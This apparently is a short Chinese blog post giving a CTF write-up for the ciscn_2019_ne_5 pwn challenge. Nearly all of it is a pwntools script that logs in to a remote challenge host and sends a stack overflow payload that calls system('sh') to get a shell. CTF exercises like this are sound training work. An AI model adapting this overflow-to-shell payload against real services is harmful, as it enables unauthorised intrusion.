ciscn_2019_ne_5 wp

January 10, 20261 分钟阅读 BUU BUU

from pwn import *  
  
# p = process('./ne_5')  
p = remote("node5.buuoj.cn", 29898)  
sh = 0x80482ea  
sys_addr = 0x080484D0  
# 使用ROPgadget找  
p.sendlineafter("password:", b'administrator')  
p.sendlineafter(b'0.Exit\n:', b'1')  
  
payload = b'a' * (0x48 + 4) + p32(sys_addr) + b'aaaa' + p32(sh)  
# 使用system函数传参 同时用任意数据填充4个字节的返回地址  
p.sendlineafter(b'log info:', payload)  
  
p.sendlineafter(b'0.Exit\n:', b'4')  
p.interactive()

版权

QQ：3362192260

要拿啥吱一声拿走就行了

有些文章里的部分内容或者有些文章是摘别的作者的。早期的一些可能没留出处。有侵权联系上面那个 qq。

ciscn_2019_ne_5 wp

版权

相关文章

评论